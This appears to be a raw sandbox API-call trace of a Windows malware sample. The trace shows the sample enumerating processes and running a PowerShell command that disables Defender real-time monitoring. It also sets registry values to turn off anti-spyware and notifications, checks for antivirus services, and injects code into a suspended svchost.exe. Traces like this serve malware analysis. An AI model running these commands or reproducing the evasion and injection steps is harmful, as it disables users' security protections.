Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dee_flour.exe")) returned 1 [0140.146] lstrcmpiW (lpString1="dee_flour.exe", lpString2="MSASCui.exe") returned -1 [0140.146] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="expressionmed.exe")) returned 1 [0140.147] lstrcmpiW (lpString1="expressionmed.exe", lpString2="MSASCui.exe") returned -1 [0140.147] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="inclusive.exe")) returned 1 [0140.148] lstrcmpiW (lpString1="inclusive.exe", lpString2="MSASCui.exe") returned -1 [0140.148] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovation-painful-resulting.exe")) returned 1 [0140.149] lstrcmpiW (lpString1="innovation-painful-resulting.exe", lpString2="MSASCui.exe") returned -1 [0140.149] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="political-guide.exe")) returned 1 [0140.150] lstrcmpiW (lpString1="political-guide.exe", lpString2="MSASCui.exe") returned 1 [0140.150] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blvd.exe")) returned 1 [0140.151] lstrcmpiW (lpString1="blvd.exe", lpString2="MSASCui.exe") returned -1 [0140.151] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mails_users.exe")) returned 1 [0140.152] lstrcmpiW (lpString1="mails_users.exe", lpString2="MSASCui.exe") returned -1 [0140.152] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trading.exe")) returned 1 [0140.152] lstrcmpiW (lpString1="trading.exe", lpString2="MSASCui.exe") returned 1 [0140.152] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0140.153] lstrcmpiW (lpString1="declare.exe", lpString2="MSASCui.exe") returned -1 [0140.153] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sake_psp.exe")) returned 1 [0140.154] lstrcmpiW (lpString1="sake_psp.exe", lpString2="MSASCui.exe") returned 1 [0140.154] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="renewable-loss-purpose.exe")) returned 1 [0140.155] lstrcmpiW (lpString1="renewable-loss-purpose.exe", lpString2="MSASCui.exe") returned 1 [0140.155] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation large.exe")) returned 1 [0140.156] lstrcmpiW (lpString1="nation large.exe", lpString2="MSASCui.exe") returned 1 [0140.156] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conflicts_thermal_himself.exe")) returned 1 [0140.157] lstrcmpiW (lpString1="conflicts_thermal_himself.exe", lpString2="MSASCui.exe") returned -1 [0140.157] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wonder_transmit_petersburg.exe")) returned 1 [0140.158] lstrcmpiW (lpString1="wonder_transmit_petersburg.exe", lpString2="MSASCui.exe") returned 1 [0140.158] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0140.159] lstrcmpiW (lpString1="WINWORD.EXE", lpString2="MSASCui.exe") returned 1 [0140.159] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.160] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.160] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0140.161] lstrcmpiW (lpString1="OSPPSVC.EXE", lpString2="MSASCui.exe") returned 1 [0140.161] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0140.162] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCui.exe") returned 1 [0140.162] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.162] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0140.162] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x698, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.163] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0140.163] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.164] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0140.164] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x894, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0140.165] lstrcmpiW (lpString1="powershell.exe", lpString2="MSASCui.exe") returned 1 [0140.165] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="tmp7149.exe")) returned 1 [0140.166] lstrcmpiW (lpString1="tmp7149.exe", lpString2="MSASCui.exe") returned 1 [0140.166] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x528, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.166] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0140.166] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x668, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0140.167] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0140.167] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.168] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0140.168] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0140.169] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0140.169] Process32NextW (in: hSnapshot=0x12c, lppe=0x28df90 | out: lppe=0x28df90*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0140.170] CloseHandle (hObject=0x12c) returned 1 [0140.170] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x28e170*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e160 | out: lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x28e160*(hProcess=0x124, hThread=0x12c, dwProcessId=0x558, dwThreadId=0x97c)) returned 1 [0140.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x102, phkResult=0x28e1b8 | out: phkResult=0x28e1b8*=0x0) returned 0x2 [0140.187] RegSetValueExW (hKey=0x0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x28e1b4, cbData=0x4) returned 0x6 [0140.187] RegCloseKey (hKey=0x0) returned 0x6 [0140.187] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications", ulOptions=0x0, samDesired=0x102, phkResult=0x28e1b8 | out: phkResult=0x28e1b8*=0x0) returned 0x2 [0140.187] RegSetValueExW (hKey=0x0, lpValueName="DisableNotifications", Reserved=0x0, dwType=0x4, lpData=0x28e1b4, cbData=0x4) returned 0x6 [0140.187] RegCloseKey (hKey=0x0) returned 0x6 [0140.187] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x917dd8 [0140.188] OpenServiceW (hSCManager=0x917dd8, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0 [0140.188] CloseServiceHandle (hSCObject=0x917dd8) returned 1 [0140.188] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x917dd8 [0140.188] OpenServiceW (hSCManager=0x917dd8, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0 [0140.189] CloseServiceHandle (hSCObject=0x917dd8) returned 1 [0140.189] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28df54, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe")) returned 0x37 [0140.189] GetCurrentProcess () returned 0xffffffff [0140.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x28da74 | out: TokenHandle=0x28da74*=0x130) returned 1 [0140.189] GetTokenInformation (in: TokenHandle=0x130, TokenInformationClass=0x1, TokenInformation=0x28da78, TokenInformationLength=0x4c, ReturnLength=0x28da60 | out: TokenInformation=0x28da78, ReturnLength=0x28da60) returned 1 [0140.189] AllocateAndInitializeSid (in: pIdentifierAuthority=0x28da6c, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x28da68 | out: pSid=0x28da68*=0x916a30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0140.189] EqualSid (pSid1=0x28da80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)), pSid2=0x916a30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0140.189] CloseHandle (hObject=0x130) returned 1 [0140.189] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x28db3c | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0140.192] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0140.195] VirtualAlloc (lpAddress=0x0, dwSize=0x4176, flAllocationType=0x3000, flProtect=0x40) returned 0x590000 [0140.196] VirtualAlloc (lpAddress=0x10000000, dwSize=0x7000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000 [0140.196] VirtualAlloc (lpAddress=0x10000000, dwSize=0x268, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0140.196] VirtualProtect (in: lpAddress=0x10000000, dwSize=0x268, flNewProtect=0x2, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x4) returned 1 [0140.196] VirtualAlloc (lpAddress=0x10001000, dwSize=0x290a, flAllocationType=0x1000, flProtect=0x40) returned 0x10001000 [0140.197] VirtualAlloc (lpAddress=0x10004000, dwSize=0x424, flAllocationType=0x1000, flProtect=0x40) returned 0x10004000 [0140.197] VirtualAlloc (lpAddress=0x10005000, dwSize=0x78, flAllocationType=0x1000, flProtect=0x40) returned 0x10005000 [0140.197] VirtualAlloc (lpAddress=0x10006000, dwSize=0x1e0, flAllocationType=0x1000, flProtect=0x40) returned 0x10006000 [0140.197] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x290a, flNewProtect=0x20, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0140.197] VirtualProtect (in: lpAddress=0x10004000, dwSize=0x424, flNewProtect=0x2, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0140.197] VirtualProtect (in: lpAddress=0x10005000, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0140.198] VirtualProtect (in: lpAddress=0x10006000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0140.198] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x5b0000 [0140.198] Wow64DisableWow64FsRedirection (in: OldValue=0x28dec8 | out: OldValue=0x28dec8*=0x0) returned 1 [0140.198] GetSystemDirectoryW (in: lpBuffer=0x28ded0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.198] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3ce22d*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e0e0 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0x28e0e0*(hProcess=0x138, hThread=0x13c, dwProcessId=0x980, dwThreadId=0x9a0)) returned 1 [0140.201] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000 [0140.202] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32.dll", BaseAddress=0x28e268 | out: BaseAddress=0x28e268*=0x0) returned 0xc0000018 [0140.202] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernelbase.dll", BaseAddress=0x28e270 | out: BaseAddress=0x28e270*=0x5d0000) returned 0x0 [0140.207] NtCreateEvent (in: EventHandle=0x28e2a8, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x28e2a8*=0x144) returned 0x0 [0140.207] NtCreateEvent (in: EventHandle=0x28e2b0, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x28e2b0*=0x140) returned 0x0 [0140.207] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x144, TargetProcessHandle=0x138, TargetHandle=0x28e1c8, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x28e1c8*=0x4) returned 0x0 [0140.207] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x140, TargetProcessHandle=0x138, TargetHandle=0x28e1d0, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x28e1d0*=0x8) returned 0x0 [0140.207] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e168*=0x0, ZeroBits=0x0, RegionSize=0x28e118*=0x220, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e168*=0x50000, RegionSize=0x28e118*=0x1000) returned 0x0 [0140.208] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x50000, Buffer=0x100035d0*, NumberOfBytesToWrite=0x220, NumberOfBytesWritten=0x28e170 | out: Buffer=0x100035d0*, NumberOfBytesWritten=0x28e170*=0x220) returned 0x0 [0140.209] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e168*=0x0, ZeroBits=0x0, RegionSize=0x28e118*=0x48, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e168*=0x60000, RegionSize=0x28e118*=0x1000) returned 0x0 [0140.209] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28e1c8*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28e170 | out: Buffer=0x28e1c8*, NumberOfBytesWritten=0x28e170*=0x48) returned 0x0 [0140.209] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0x28dce8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x28dce8, ReturnLength=0x0) returned 0x0 [0140.209] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x7fffffdf000, Buffer=0x28de68, NumberOfBytesToRead=0x2c8, NumberOfBytesRead=0x28e160 | out: Buffer=0x28de68*, NumberOfBytesRead=0x28e160*=0x2c8) returned 0x0 [0140.209] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xffc20000, Buffer=0x28dd18, NumberOfBytesToRead=0x40, NumberOfBytesRead=0x28e168 | out: Buffer=0x28dd18*, NumberOfBytesRead=0x28e168*=0x40) returned 0x0 [0140.209] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xffc200e8, Buffer=0x28dd58, NumberOfBytesToRead=0x108, NumberOfBytesRead=0x28e170 | out: Buffer=0x28dd58*, NumberOfBytesRead=0x28e170*=0x108) returned 0x0 [0140.209] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e138*=0xffc2246c, NumberOfBytesToProtect=0x28e168, NewAccessProtection=0x40, OldAccessProtection=0x28e160 | out: BaseAddress=0x28e138*=0xffc22000, NumberOfBytesToProtect=0x28e168, OldAccessProtection=0x28e160*=0x20) returned 0x0 [0140.209] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xffc2246c, Buffer=0x28e198*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x28e270 | out: Buffer=0x28e198*, NumberOfBytesWritten=0x28e270*=0x16) returned 0x0 [0140.210] NtClearEvent (EventHandle=0x140) returned 0x0 [0140.210] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.210] NtResumeThread (in: ThreadHandle=0x13c, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.210] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.254] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e028*=0x140000000, ZeroBits=0x0, RegionSize=0x28e118*=0x39000, AllocationType=0x2000, Protect=0x40 | out: BaseAddress=0x28e028*=0x140000000, RegionSize=0x28e118*=0x39000) returned 0x0 [0140.255] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0b0*=0x140000000, ZeroBits=0x0, RegionSize=0x28e0c8*=0x400, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e0b0*=0x140000000, RegionSize=0x28e0c8*=0x1000) returned 0x0 [0140.255] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140000000, Buffer=0x918998*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x28e030 | out: Buffer=0x918998*, NumberOfBytesWritten=0x28e030*=0x400) returned 0x0 [0140.255] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0d8*=0x140000000, NumberOfBytesToProtect=0x28e0b8, NewAccessProtection=0x2, OldAccessProtection=0x28e268 | out: BaseAddress=0x28e0d8*=0x140000000, NumberOfBytesToProtect=0x28e0b8, OldAccessProtection=0x28e268*=0x4) returned 0x0 [0140.255] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e050*=0x140001000, ZeroBits=0x0, RegionSize=0x28e150*=0x28a00, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140001000, RegionSize=0x28e150*=0x29000) returned 0x0 [0140.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x28a00, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x640000, RegionSize=0x28e0e8*=0x29000) returned 0x0 [0140.257] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140001000, Buffer=0x640000*, NumberOfBytesToWrite=0x28a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dfd8*=0x28a00) returned 0x0 [0140.259] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x640000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0140.260] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x140001000, Buffer=0x918d98*, NumberOfBytesToWrite=0x28a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x918d98*, NumberOfBytesWritten=0x28dfd8*=0x28a00) returned 0x0 [0140.261] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e050*=0x14002a000, ZeroBits=0x0, RegionSize=0x28e150*=0x8a00, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x14002a000, RegionSize=0x28e150*=0x9000) returned 0x0 [0140.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x8a00, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x640000, RegionSize=0x28e0e8*=0x9000) returned 0x0 [0140.261] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a000, Buffer=0x640000*, NumberOfBytesToWrite=0x8a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28dfd8*=0x8a00) returned 0x0 [0140.262] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x640000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0140.262] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a000, Buffer=0x941798*, NumberOfBytesToWrite=0x8a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x941798*, NumberOfBytesWritten=0x28dfd8*=0x8a00) returned 0x0 [0140.262] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e050*=0x140033000, ZeroBits=0x0, RegionSize=0x28e150*=0xda0, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140033000, RegionSize=0x28e150*=0x1000) returned 0x0 [0140.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0xda0, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x640000, RegionSize=0x28e0e8*=0x1000) returned 0x0 [0140.263] 